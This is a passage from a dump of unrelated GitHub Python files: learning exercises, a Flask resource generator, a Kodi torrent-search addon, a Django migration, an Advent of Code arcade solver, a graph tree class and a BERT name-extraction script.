None)\n","repo_name":"meanthadar-p/python-practice","sub_path":"Medium/TheTimeInWords/TheTimeInWords.py","file_name":"TheTimeInWords.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70544129770","text":"def print_lines (filename):\n with open (filename) as file:\n for line in file:\n print (line.strip())\n\ndef word_search (filename):\n word = input (\"Enter a word: \")\n word_lower = word.lower()\n with open (filename) as file:\n for line in file:\n line = line.strip ()\n line_lower = line.lower ()\n if word_lower == line_lower:\n print (\"Word was found!\")\n file.close ()\n return\n \n print (\"Word was not found!\")\n file.close ()\n\ndef longest_word (a_string):\n tokens = a_string.split()\n longest = \"\"\n for word in tokens:\n if len(word) > len(longest):\n longest = word\n print (longest)\n return longest\n\ndef longest_words (filename):\n longest = \"\"\n with open (filename) as file:\n for line in file:\n stripped = line.strip()\n if stripped != \"\":\n word = longest_word (line)\n if len(word) > len (longest):\n print (word)\n\ndef prompt_and_write ():\n filename = input (\"Enter a filename: \")\n with open (filename, \"w\") as file:\n while True:\n line = input (\">> \")\n if line == \"\":\n break\n else:\n file.write (line)\n file.write (\"\\n\")\n\ndef main ():\n # print_lines (\"data/alice.txt\")\n # word_search (\"data/words.txt\")\n # longest_word (\"The quick brown fox jumped over the lazy dog.\")\n # longest_words (\"data/alice.txt\")\n prompt_and_write ()\n \nif __name__ == \"__main__\":\n main ()\n","repo_name":"alextedesco/GCIS-120","sub_path":"Unit03/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"19770966015","text":"# flask_restful_dbbase/generator.py\n\"\"\"\nThis module implements a technique for creating resources with specific\nmethods.\n\nA customized resource can be created from a resource, but with some\nof the default HTTP methods removed, but with customized resource\nmodifications applied to make a unique resource.\n\"\"\"\nfrom flask_restful_dbbase.resources import DBBaseResource\n\n\ndef create_resource(\n name,\n resource_class,\n model_class=None,\n methods=None,\n url_prefix=None,\n url_name=None,\n class_vars=None,\n):\n \"\"\"\n This function creates a resource based on a source model class\n and a seed resource.\n\n Args:\n name: (str) : This will be the name stored with the new\n class.\n\n resource_class: (obj) : This is the ModelResource class that\n will be used as the basis of the new class.\n\n methods: (list) : This the list of HTTP methods that should\n be transferred to the new class.\n\n url_prefix: (str) : This is url_prefix that can be used in place of\n the default url_prefix that comes with the resource class.\n\n url_name: (str) : This the url_name that can be used in place\n of the default url_name that comes with the resource.\n\n class_vars: (dict) : This is a dictionary of variables and\n values that will be transferred to the new resource. These\n are set in place last, so it is here that additional\n customization of the new resource can be made.\n\n Returns:\n (obj) : The new resource class\n \"\"\"\n params = {}\n if model_class is not None:\n params[\"model_class\"] = model_class\n if url_prefix is not None:\n params[\"url_prefix\"] = url_prefix\n if url_prefix is not None:\n params[\"url_name\"] = url_name\n\n # accumulate changes from subclassing\n # follow subclassing order\n class_dict = {}\n idx = resource_class.mro().index(DBBaseResource)\n for i in range(idx - 1, -1, -1):\n cls = resource_class.mro()[i]\n class_dict.update(cls.__dict__)\n if methods is not None:\n # create stop list\n stop_method_list = [\"get\", \"post\", \"put\", \"patch\", \"delete\"]\n for method in methods:\n if method in stop_method_list:\n stop_method_list.remove(method)\n\n for method in stop_method_list:\n del class_dict[method]\n del class_dict[f\"process_{method}_input\"]\n class_dict[\"methods\"] = set([method.upper() for method in methods])\n\n class_dict.update(params)\n\n if class_vars is not None:\n class_dict.update(class_vars)\n\n new_class = type(\n name,\n (DBBaseResource,),\n class_dict,\n )\n\n # required model check\n if new_class.model_class is None:\n raise ValueError(\"A model class must be defined\")\n\n return new_class\n","repo_name":"sidorof/flask-restful-dbbase","sub_path":"flask_restful_dbbase/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"1350131215","text":"\"\"\"The :mod:`pyts.multivariate.utils` module includes utility tools.\"\"\"\n\nfrom sklearn.utils import check_array\n\n\ndef check_3d_array(X):\n \"\"\"Check that the input is a three-dimensional arrayself.\n\n Parameters\n ----------\n X : array-like\n Input data\n\n \"\"\"\n X = check_array(X, ensure_2d=False, allow_nd=True)\n if X.ndim != 3:\n raise ValueError(\"X must be 3-dimensional (got {0}).\".format(X.ndim))\n return X\n","repo_name":"martanto/pyts","sub_path":"pyts/multivariate/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"}
+{"seq_id":"72634647848","text":"# -*- coding: utf-8 -*-\r\nimport xbmc\r\nimport sys, xbmcplugin, xbmcgui, xbmcaddon, os, json, hashlib, re, unicodedata, math, xbmcvfs\r\nimport shutil\r\nfrom urllib.parse import urlparse, quote_plus, unquote, urlencode\r\nfrom urllib.request import urlopen, Request\r\nimport urllib.request, urllib.parse, urllib.error\r\nimport urllib.parse\r\n\r\nfrom metadatautils import MetadataUtils\r\nmg = MetadataUtils()\r\nmg.tmdb.api_key = 'bd6af17904b638d482df1a924f1eabb4'\r\n\r\nAddonID = 'plugin.video.CubeTor'\r\nAddon = xbmcaddon.Addon(AddonID)\r\nAddonName = Addon.getAddonInfo(\"name\")\r\naddonDir = Addon.getAddonInfo('path')\r\nicon = os.path.join(addonDir,\"icon.png\")\r\niconsDir = os.path.join(addonDir, \"resources\", \"images\")\r\n\r\nMUlang = \"pt-BR\" if Addon.getSetting(\"MUlang\") == \"1\" else \"en\"\r\nMUlangM = \"pt-BR\" if Addon.getSetting(\"MUlangM\") == \"1\" else \"en\"\r\nMUcache = True if Addon.getSetting(\"MUcache\") == \"true\" else False\r\nMUcacheEpi = True if Addon.getSetting(\"MUcacheEpi\") == \"true\" else False\r\nMUfanArt = True if Addon.getSetting(\"MUfanArt\") == \"true\" else False\r\n\r\nlibDir = os.path.join(addonDir, 'resources', 'lib')\r\nsys.path.insert(0, libDir)\r\nimport xx, common\r\n\r\naddon_data_dir = xbmcvfs.translatePath(Addon.getAddonInfo(\"profile\"))\r\ncacheDir = os.path.join(addon_data_dir, \"cache\")\r\n#-----------------------------------------\r\nparams = urllib.parse.parse_qs(sys.argv[2][1:])\r\nname = params.get('name',[None])[0]\r\nurl = params.get('url',[None])[0]\r\nmode = params.get('mode',[None])[0]\r\niconimage = params.get('iconimage',[None])[0]\r\nlogos = params.get('logos',[None])[0]\r\ninfo = params.get('info',[None])[0]\r\ndados = params.get('dados',[{}])[0]\r\n#-----------------------------------------\r\ndef PeerSeed(url2):\r\n\timport html\r\n\ttry:\r\n\t\tlink = quote_plus(html.unescape(url2))\r\n\t\tseeds = common.OpenURL(\"https://checker.openwebtorrent.com/check?magnet=\"+link, ssl=True)\r\n\t\tj = json.loads(seeds)\r\n\texcept:\r\n\t\tj = {\"error\": \"nao carregou\"}\r\n\treturn j\r\n#-----------------------------------------\r\ndef BuscaTvShowsPre():\r\n\tq = xbmcgui.Dialog().input(\"O que busca? 
(Séries)\")\r\n\tif not q:\r\n\t\tRP = \"plugin://plugin.video.CubeTor/?mode=&url=\"\r\n\t\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\n\t\treturn\r\n\tRP = \"plugin://plugin.video.CubeTor/?mode=google.BuscaTvShows&url=\"+quote_plus(q)\r\n\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\ndef BuscaTvShows():\r\n\tlink = xx.OpenURL(\"http://api.themoviedb.org/3/search/tv?api_key=bd6af17904b638d482df1a924f1eabb4&language=en&query=\"+quote_plus(url))\r\n\tentries=json.loads(link)\r\n\t#ST(entries)\r\n\t#mmm = mg.get_tvshow_details(title=\"\",tmdb_id=url, ignore_cache=MUcache, lang=MUlang)\r\n\tprogress = xbmcgui.DialogProgress()\r\n\tprogress.create('Carregando...')\r\n\tprogress.update(0, \"Carregando...\")\r\n\tprog = 1\r\n\tprogress.close()\r\n\tfor entry in entries['results']:\r\n\t\t#ST(entry)\r\n\t\tif (progress.iscanceled()): break\r\n\t\tprogtotal = int( 100*prog/len(entries['results']) )\r\n\t\tprogress.update(progtotal, str(progtotal)+\" %\")\r\n\t\tprog+=1\r\n\t\ttry:\r\n\t\t\tmmm = mg.get_tvshow_details(title=\"\",tmdb_id=str(entry[\"id\"]), ignore_cache=MUcache, lang=MUlang)\r\n\t\t\t#xx.AddDir(str(entry['id']), \"plugin://plugin.video.elementum/library/movie/play/\"+str(entry['id'])+\"?doresume=true\", \"PlayUrl\", isFolder=False, IsPlayable=True, dados={'mmeta': mm})\r\n\t\t\txx.AddDir(mmm[-1][\"TVShowTitle\"], mmm[-1][\"tmdb_id\"], \"trakt.Shows\", isFolder=True, dados={'meta': mmm[-1]})\r\n\t\texcept:\r\n\t\t\tpass\r\n#-----------------------------------------\r\ndef BuscaFilmesPre():\r\n\tq = xbmcgui.Dialog().input(\"Se quiser colocar o ano faça dessa forma: Titanic, 1997\")\r\n\t#q = \"Mortal Kombat, 2021\"\r\n\tif not q:\r\n\t\tRP = \"plugin://plugin.video.CubeTor/?mode=&url=\"\r\n\t\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\n\t\treturn\r\n\tRP = \"plugin://plugin.video.CubeTor/?mode=google.BuscaFilmes&url=\"+quote_plus(q)\r\n\txbmc.executebuiltin('ActivateWindow(10025,\"'+RP+'\")')\r\n\t#q = \"Mortal Kombat\"\r\ndef BuscaFilmes():\r\n\tyearre = re.compile(\", (\\d{4})$\").findall(url)\r\n\tquery = quote_plus(re.sub(', (\\d{4})$', '', url))\r\n\tif yearre:\r\n\t\tyear=\"&year=\"+yearre[0]\r\n\telse:\r\n\t\tyear=\"\"\r\n\tST(\"http://api.themoviedb.org/3/search/movie?api_key=bd6af17904b638d482df1a924f1eabb4&language=pt-br&query=\"+query+year)\r\n\tlink = xx.OpenURL(\"http://api.themoviedb.org/3/search/movie?api_key=bd6af17904b638d482df1a924f1eabb4&language=pt-br&query=\"+query+year)\r\n\tentries=json.loads(link)\r\n\tprogress = xbmcgui.DialogProgress()\r\n\tprogress.create('Carregando...')\r\n\tprogress.update(0, \"Carregando...\")\r\n\tprog = 1\r\n\ttrak = xx.traktM()\r\n\tfor entry in entries['results']:\r\n\t\tif (progress.iscanceled()): break\r\n\t\tprogtotal = int( 100*prog/len(entries['results']) )\r\n\t\tprogress.update(progtotal, str(progtotal)+\" %\")\r\n\t\tprog+=1\r\n\t\ttry:\r\n\t\t\tmm = mg.get_tmdb_details(tmdb_id=str(entry['id']), imdb_id=\"\", tvdb_id=\"\", title=\"\", year=\"\", media_type=\"movies\", preftype=\"\", manual_select=False, ignore_cache=False, lang=MUlangM)\r\n\t\t\tpc = 1 if str(mm[\"tmdb_id\"]) in trak else None\r\n\t\t\t#xx.AddDir(str(entry['id']), \"plugin://plugin.video.elementum/library/movie/play/\"+str(entry['id'])+\"?doresume=true\", \"PlayUrl\", isFolder=False, IsPlayable=True, dados={'mmeta': mm})\r\n\t\t\txx.AddDir(\"\", str(entry['id']), \"tmdb.Opcoes\", isFolder=False, IsPlayable=True, dados={'mmeta': mm, 'pc': pc})\r\n\t\texcept:\r\n\t\t\tpass\r\n\tprogress.close()\r\n\txx.AddDir(url+\" 
Dublado 1080p\", quote_plus(url+\" Dublado 1080p\"), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n\txx.AddDir(url+\" x265\", quote_plus(url+\" x265\"), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n\txx.AddDir(url+\" YTS\", quote_plus(url+\" YTS\"), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n\txx.AddDir(url, quote_plus(url), \"google.BuscaCat\", \"\", info=\"\", isFolder=True, IsPlayable=False)\r\n#-----------------------------------------\r\ndef BuscaCat():\r\n\ttry:\r\n\t\tgoogle = xx.OpenURL(\"https://www.google.com/search?q=\"+url+\"+torrent\")\r\n\t\tgooglere = re.compile(\";url=([^\\\"]+)\\&ved\\=\").findall(google)\r\n\t\tprogress = xbmcgui.DialogProgress()\r\n\t\tprogress.create('Carregando...')\r\n\t\tprogress.update(0, \"Carregando...\")\r\n\t\tprog = 1\r\n\t\t#ST(googlere)\r\n\t\tfor links in googlere[:5]:\r\n\t\t\tif (progress.iscanceled()): break\r\n\t\t\tmagnet = xx.OpenURL(links)\r\n\t\t\tmagnetre = re.compile('magnet\\:\\?[^\\'|\"]+').findall(magnet)\r\n\t\t\tfor link in magnetre:\r\n\t\t\t\ttitle = re.compile(\"dn=(.+?)(\\&|$)\").findall(link)\r\n\t\t\t\tif title:\r\n\t\t\t\t\tj = PeerSeed(link)\r\n\t\t\t\t\tif \"seeds\" in j:\r\n\t\t\t\t\t\txx.AddDir(str(j[\"seeds\"])+\" / \"+str(j[\"peers\"])+\" \"+unquote(title[0][0]), link, \"comando.PlayTorrents\", iconimage, info=links, isFolder=False, IsPlayable=True)\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\txx.AddDir(unquote(title[0][0]), link, \"comando.PlayTorrents\", iconimage, info=links, isFolder=False, IsPlayable=True)\r\n\t\t\tprogtotal = int(100*prog/5)\r\n\t\t\tprogress.update(progtotal, str(progtotal)+\" %\")\r\n\t\t\tprog+=1\r\n\t\tprogress.close()\r\n\texcept:\r\n\t\txx.AddDir(\"Erro no servidor\", \"\", \"\", iconimage, info=\"\", isFolder=False, IsPlayable=True)\r\n#----------------------------------------\r\ndef ST(x=\"\", o=\"w\"):\r\n\tif o == \"1\":\r\n\t\to = \"a+\"\r\n\tif type(x) == type({}) or type(x) == type([]):\r\n\t\ty = json.dumps(x, indent=4, ensure_ascii=True)\r\n\telse:\r\n\t\ty = str(str(x).encode(\"utf-8\"))\r\n\tPath = xbmc.translatePath( xbmcaddon.Addon().getAddonInfo('path') )\r\n\tpy = os.path.join( Path, \"study.txt\")\r\n\t#file = open(py, \"a+\")\r\n\tfile = open(py, o)\r\n\tfile.write(y+\"\\n\"+str(type(x)))\r\n\tfile.close()","repo_name":"D4anielCB/plugin.video.CubeTor","sub_path":"resources/lib/google.py","file_name":"google.py","file_ext":"py","file_size_in_byte":7337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"70093216807","text":"\"\"\"!\nPath in a given graph\n\"\"\"\n\nimport math\nfrom typing import Any, Callable, Dict, List, Optional, Set, Tuple, Union\nfrom uuid import uuid4\n\nfrom pygmodels.gmodel.path import Path\nfrom pygmodels.graphf.bgraphops import BaseGraphOps\nfrom pygmodels.graphf.graphsearcher import BaseGraphSearcher\nfrom pygmodels.gtype.abstractobj import AbstractTree\nfrom pygmodels.gtype.basegraph import BaseGraph\nfrom pygmodels.gtype.edge import Edge, EdgeType\nfrom pygmodels.gtype.node import Node\nfrom pygmodels.gtype.queue import PriorityQueue\n\n\nclass Tree(BaseGraph, AbstractTree):\n \"\"\"!\n Ordered Tree object\n \"\"\"\n\n def __init__(self, gid: str, data={}, edges: Set[Edge] = None):\n \"\"\"\"\"\"\n nodes = None\n if edges is not None:\n nodes = set()\n for e in edges:\n estart = e.start()\n eend = e.end()\n nodes.add(estart)\n nodes.add(eend)\n super().__init__(gid=gid, data=data, nodes=nodes, edges=edges)\n self.__root = None\n es = [e.type() for e in self.E]\n if es[0] == EdgeType.DIRECTED:\n\n def egen(x):\n return BaseGraphOps.outgoing_edges_of(self, x)\n\n else:\n\n def egen(x):\n return BaseGraphOps.edges_of(self, x)\n\n self.paths: Dict[\n str, Union[dict, set]\n ] = BaseGraphSearcher.breadth_first_search(\n self, n1=self.root, edge_generator=egen\n )\n self.topsort = self.paths.top_sort\n self.bfs_tree = self.paths.tree[self.root.id()]\n\n @classmethod\n def from_node_tuples(cls, ntpls: Set[Tuple[Node, Node, EdgeType]]):\n \"\"\"\"\"\"\n edges: Set[Edge] = set()\n\n for e in ntpls:\n child = e[0]\n parent = e[1]\n edge = Edge(\n edge_id=str(uuid4()),\n start_node=parent,\n end_node=child,\n edge_type=e[2],\n )\n edges.add(edge)\n return Tree(gid=str(uuid4()), edges=edges)\n\n @classmethod\n def from_edgeset(cls, eset: Set[Edge]):\n \"\"\"\"\"\"\n return Tree(gid=str(uuid4()), edges=eset)\n\n def node_table(self):\n \"\"\"\"\"\"\n node_table = {\n v.id(): {\"child\": False, \"parent\": False} for v in self.V\n }\n for e in self.E:\n estart_id = e.start().id()\n eend_id = e.end().id()\n node_table[estart_id][\"parent\"] = True\n node_table[eend_id][\"child\"] = True\n #\n return node_table\n\n def get_root(self):\n \"\"\"\"\"\"\n node_table = self.node_table()\n root_ids = [\n k\n for k, v in node_table.items()\n if v[\"child\"] is False and v[\"parent\"] is True\n ]\n V = {v.id(): v for v in self.V}\n return V[root_ids[0]]\n\n def leaves(self) -> Set[Node]:\n \"\"\"\"\"\"\n node_table = self.node_table()\n #\n leave_ids = [\n k\n for k, v in node_table.items()\n if v[\"child\"] is True and v[\"parent\"] is False\n ]\n return set([v for v in self.V if v.id() in leave_ids])\n\n @property\n def root(self) -> Node:\n \"\"\"\"\"\"\n if self.__root is None:\n self.__root = self.get_root()\n return self.__root\n\n def height_of(self, n: Node) -> int:\n \"\"\"!\"\"\"\n if not BaseGraphOps.is_in(self, n):\n raise ValueError(\"node not in tree\")\n nid = n.id()\n return self.topsort[nid]\n\n def _is_closure_of(\n self, x: Node, y: Node, fn: Callable[[int, int], bool]\n ) -> bool:\n \"\"\"\"\"\"\n xheight = self.height_of(x)\n yheight = self.height_of(y)\n f = fn(xheight, yheight)\n print(f)\n print(x)\n print(y)\n return f\n\n def is_upclosure_of(self, x_src: Node, y_dst: Node) -> bool:\n \"\"\"!\n From Diestel 2017, p. 15\n is x upclosure of y\n \"\"\"\n xheight = self.height_of(x_src)\n yheight = self.height_of(y_dst)\n return yheight >= xheight\n\n def is_downclosure_of(self, x_src: Node, y_dst: Node) -> bool:\n \"\"\"!\n From Diestel 2017, p. 
15\n is x down closure of y\n \"\"\"\n xheight = self.height_of(x_src)\n yheight = self.height_of(y_dst)\n return yheight <= xheight\n\n def upset_of(self, n: Node) -> Set[Node]:\n \"\"\"!\n From Diestel 2017, p. 15\n \"\"\"\n return self.is_set_of(n, fn=self.is_upclosure_of)\n\n def downset_of(self, n: Node) -> Set[Node]:\n \"\"\"!\n From Diestel 2017, p. 15\n \"\"\"\n return self.is_set_of(n, fn=self.is_downclosure_of)\n\n def is_set_of(\n self, n: Node, fn: Callable[[Node, Node], bool]\n ) -> Set[Node]:\n nodes = BaseGraphOps.nodes(self)\n nset = set([y for y in nodes if fn(n, y) is True])\n return nset\n\n def less_than_or_equal(self, first: Node, second: Node) -> bool:\n \"\"\"\"\"\"\n return self.height_of(first) <= self.height_of(second)\n\n def greater_than_or_equal(self, first: Node, second: Node) -> bool:\n \"\"\"\"\"\"\n return self.height_of(first) >= self.height_of(second)\n\n def nodes_per_level(self, level: int) -> Set[Node]:\n \"\"\"!\n extract nodes of certain level in tree\n \"\"\"\n return set(\n [n for n in BaseGraphOps.nodes(self) if self.height_of(n) == level]\n )\n\n def extract_path(\n self,\n start: Node,\n end: Node,\n filter_fn: Callable[[Set[Edge], str], Set[Edge]] = lambda es, n: set(\n [e for e in es if e.start().id() == n]\n ),\n costfn: Callable[[Edge, float], float] = lambda x, y: y + 1.0,\n is_min=True,\n ):\n \"\"\"\"\"\"\n if (\n BaseGraphOps.is_in(self, start) is False\n or BaseGraphOps.is_in(self, end) is False\n ):\n raise ValueError(\"start or end node is not inside tree\")\n #\n upset = self.upset_of(start)\n if end not in upset:\n raise ValueError(\"end node is not in upset of start.\")\n downset = self.downset_of(end)\n upset_edges = set()\n for u in upset:\n for e in BaseGraphOps.outgoing_edges_of(self, u):\n upset_edges.add(e)\n downset_edges = set()\n for d in downset:\n for e in BaseGraphOps.outgoing_edges_of(self, d):\n downset_edges.add(e)\n problem_set = upset_edges.intersection(downset_edges)\n ucs_path = Path.from_ucs(\n g=self,\n goal=end,\n start=start,\n filter_fn=filter_fn,\n costfn=costfn,\n is_min=is_min,\n problem_set=problem_set,\n )\n return ucs_path\n\n @classmethod\n def find_mst_prim(\n cls, g: BaseGraph, edge_generator: Callable[[Node], Set[Node]]\n ) -> AbstractTree:\n \"\"\"!\n Find minimum spanning tree as per Prim's algorithm\n Even and Guy Even 2012, p. 32\n \"\"\"\n l_e = 1 # length of an edge\n l_vs = {}\n vs = []\n eps = {}\n\n for v in g.V:\n l_vs[v] = math.inf\n vs.append(v)\n #\n s = vs[0]\n l_vs[s] = 0\n eps[s] = set()\n TEMP = vs.copy()\n T: Set[Edge] = set()\n while TEMP:\n minv = None\n minl = math.inf\n for v in TEMP:\n if l_vs[v] < minl:\n minl = l_vs[v]\n minv = v\n TEMP = [v for v in TEMP if v != minv]\n if minv is None:\n raise ValueError(\n \"Min vertex is not found. Graph is probably not connected\"\n )\n T = T.union(eps[minv])\n for edge in edge_generator(g.V[minv]):\n unode = edge.get_other(g.V[minv])\n u = unode.id()\n if u in TEMP and l_vs[u] > l_e:\n l_vs[u] = l_e\n eps[u] = set([edge])\n return cls.from_edgeset(eset=T)\n\n @classmethod\n def find_mnmx_st(\n cls,\n g: BaseGraph,\n edge_generator: Callable[[Node], Set[Edge]],\n weight_function: Callable[[Edge], float] = lambda x: 1,\n is_min: bool = True,\n ) -> Tuple[AbstractTree, List[Edge]]:\n \"\"\"!\n a modified version of kruskal minimum spanning tree adapted for\n finding minimum and maximum weighted spanning tree of a graph\n\n from Even and Guy Even 2012, p. 
42\n \"\"\"\n queue = PriorityQueue(is_min=is_min)\n T: Set[Edge] = set()\n clusters = {v.id(): set([v]) for v in g.V}\n L: List[Edge] = []\n for edge in g.E:\n queue.insert(weight_function(edge), edge)\n #\n while len(queue) > 0:\n edge = None\n if is_min is True:\n k, edge = queue.min()\n else:\n k, edge = queue.max()\n #\n u = edge.start().id()\n v = edge.end().id()\n vset = clusters[v]\n uset = clusters[u]\n if vset != uset:\n T.add(edge)\n L.append(edge)\n clusters[v] = vset.union(uset)\n clusters[u] = vset.union(uset)\n return cls.from_edgeset(eset=T), L\n\n #\n def assign_num(\n self,\n v: str,\n num: Dict[str, int],\n visited: Dict[str, bool],\n parent: Dict[str, str],\n counter: int,\n generative_fn: Callable[[Node], Set[Node]],\n ):\n \"\"\"\"\"\"\n counter += 1\n num[v] = counter\n visited[v] = True\n vnode = self.V[v]\n for unode in generative_fn(vnode):\n u = unode.id()\n cond = visited.get(u)\n if cond is None or cond is False:\n parent[u] = v\n self.assign_num(\n u,\n num=num,\n generative_fn=generative_fn,\n visited=visited,\n parent=parent,\n counter=counter,\n )\n\n #\n def check_ap(\n self,\n v: str,\n num: Dict[str, int],\n visited: Dict[str, bool],\n parent: Dict[str, str],\n low: Dict[str, int],\n counter: int,\n aset: Set[str],\n generative_fn: Callable[[Node], Set[Node]],\n ):\n \"\"\"\"\"\"\n low[v] = num[v]\n vnode = self.V[v]\n for unode in generative_fn(vnode):\n u = unode.id()\n if num[u] >= num[v]:\n self.check_ap(\n v=u,\n num=num,\n visited=visited,\n parent=parent,\n low=low,\n counter=counter,\n generative_fn=generative_fn,\n aset=aset,\n )\n if low[u] >= num[v]:\n aset.add(v)\n #\n low[v] = min(low[v], low[u])\n elif parent[v] != u:\n low[v] = min(low[v], num[u])\n\n def find_separating_vertices(\n self, generative_fn: Callable[[Node], Set[Node]]\n ) -> Set[Node]:\n \"\"\"!\n find separating vertices of graph\n as in Erciyes 2018, p. 230, algorithm 8.3\n \"\"\"\n num: Dict[str, float] = {n: math.inf for n in self.V}\n low: Dict[str, float] = {n: math.inf for n in self.V}\n visited: Dict[str, bool] = {}\n parent: Dict[str, str] = {n: \"\" for n in self.V}\n aset: Set[str] = set()\n\n counter = 1\n v = [node for node in self.V][0]\n self.assign_num(\n v=v,\n num=num,\n visited=visited,\n parent=parent,\n counter=counter,\n generative_fn=generative_fn,\n )\n self.check_ap(\n v=v,\n num=num,\n visited=visited,\n generative_fn=generative_fn,\n parent=parent,\n low=low,\n counter=counter,\n aset=aset,\n )\n return set([self.V[a] for a in aset])\n","repo_name":"D-K-E/graphical-models","sub_path":"pygmodels/gmodel/tree.py","file_name":"tree.py","file_ext":"py","file_size_in_byte":12106,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"34716471510","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport oilserver.utils\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('oilserver', '0010_auto_20160404_2138'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='testcase',\n name='uuid',\n field=models.CharField(max_length=36, unique=True, help_text='UUID of this testcase.', default=oilserver.utils.generate_uuid),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='testcaseclass',\n name='uuid',\n field=models.CharField(max_length=36, unique=True, help_text='UUID of this testcaseclass.', default=oilserver.utils.generate_uuid),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='testframework',\n name='uuid',\n field=models.CharField(max_length=36, unique=True, help_text='UUID of this test framework and version.', default=oilserver.utils.generate_uuid),\n preserve_default=True,\n ),\n ]\n","repo_name":"autonomouse/dashboard","sub_path":"weebl/oilserver/migrations/0011_auto_20160404_2139.py","file_name":"0011_auto_20160404_2139.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"21751456946","text":"from . import computer\n\n\ndef part1():\n \"\"\"\n The software draws tiles to the screen with output instructions:\n every three output instructions specify the x position (distance from the left), y position (distance from the top), and tile id.\n\n 0 is an empty tile. No game object appears in this tile.\n 1 is a wall tile. Walls are indestructible barriers.\n 2 is a block tile. Blocks can be broken by the ball.\n 3 is a horizontal paddle tile. The paddle is indestructible.\n 4 is a ball tile. The ball moves diagonally and bounces off objects.\n\n How many block tiles are on the screen when the game exits?\n \"\"\"\n program = read_input()\n output_values = []\n computer.run_program(program, [], output_values)\n blocks = output_values[2::3].count(2)\n print(blocks)\n\n\ndef part2():\n \"\"\"\n Memory address 0 represents the number of quarters that have been inserted; set it to 2 to play for free.\n The arcade cabinet has a joystick that can move left and right.\n If the joystick is in the neutral position, provide 0.\n If the joystick is tilted to the left, provide -1.\n If the joystick is tilted to the right, provide 1.\n When three output instructions specify X=-1, Y=0, the third output instruction is the new score.\n What is your score after the last block is broken?\n \"\"\"\n program = read_input()\n program[0] = 2\n input_values = []\n arcade = computer.get_computer(program, input_values)\n score = 0\n ball_x = 0\n paddle_x = 0\n while True:\n x = next(arcade)\n if type(x) == list: # When the game is finished and the program halts, the computer outputs the program state\n break\n y = next(arcade)\n v = next(arcade)\n if v == 3:\n paddle_x = x\n elif v == 4: # Every tick, the last value to be updated is that of the ball\n ball_x = x\n next_input = 0\n if ball_x < paddle_x:\n next_input = -1\n elif ball_x > paddle_x:\n next_input = 1\n input_values.append(next_input)\n if x == -1:\n score = v\n print(score)\n\n\ndef read_input():\n with open('input/day13.txt') as input_file:\n return [int(x) for x in input_file.readline().split(',')]\n","repo_name":"Metamess/AdventOfCode","sub_path":"2019/days/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"3221607259","text":"from io import StringIO\nfrom fastapi import Depends\nimport pandas as pd\n\nfrom api.crud.crud import create_excerpt_metadata, create_named_entity\nfrom api.model.schemas import ExcerptMetadataCreate, NamedEntityCreate\n\nfrom database.connection import SessionLocal\n\ndef get_db():\n db = SessionLocal()\n try:\n yield db\n finally:\n db.close()\n\n'''\nCitação de projeto utilizado: https://github.com/neuralmind-ai/portuguese-bert\n@InProceedings{souza2020bertimbau,\n author=\"Souza, F{\\'a}bio and Nogueira, Rodrigo and Lotufo, Roberto\",\n editor=\"Cerri, Ricardo and Prati, Ronaldo C.\",\n title=\"BERTimbau: Pretrained BERT Models for Brazilian Portuguese\",\n booktitle=\"Intelligent Systems\",\n year=\"2020\",\n publisher=\"Springer International Publishing\",\n address=\"Cham\",\n pages=\"403--417\",\n isbn=\"978-3-030-61377-8\"\n}\n'''\n\nfrom transformers import BertForTokenClassification, DistilBertTokenizerFast, pipeline\n\nmodel = BertForTokenClassification.from_pretrained('pierreguillou/ner-bert-large-cased-pt-lenerbr')\ntokenizer = DistilBertTokenizerFast.from_pretrained('pierreguillou/bert-large-cased-pt-lenerbr'\n , model_max_length=512\n , do_lower_case=False\n )\nnlp = pipeline('ner', model=model, tokenizer=tokenizer, grouped_entities=True)\n\ndef find_people(id:str, text:str) -> list:\n\n result = nlp(str(text).replace('- ', ''))\n names = []\n lastIndex = 0\n\n for item in result:\n if item['entity_group'] == \"PESSOA\":\n if \"#\" in item['word'] and names != []:\n name = names[lastIndex]['content']\n name += item['word']\n names[lastIndex]['content'] = name.replace(\"#\", '')\n names[lastIndex]['end_offset'] = item['end']\n else:\n names.append({\n 'excerpt_id': id,\n 'content': item['word'],\n 'start_offset': item['start'],\n 'end_offset': 0,\n 'entity_type': 'PERSON'\n })\n lastIndex = len(names) - 1\n \n #if names != []:\n #print(names)\n return names\n\n### FOR TESTS PURPOSE ONLY ###\n\ndef execute_csv(file):\n \n contents = file.file.read()\n s = str(contents,'utf-8')\n data = StringIO(s)\n df = pd.read_csv(data)\n count_excerpt = 0\n count_named_entities = 0\n for index, row in df.iterrows():\n names = find_people(row['excerpt_id'], row['excerpt'])\n excerpt_metadata = ExcerptMetadataCreate(excerpt_id=row['excerpt_id'], 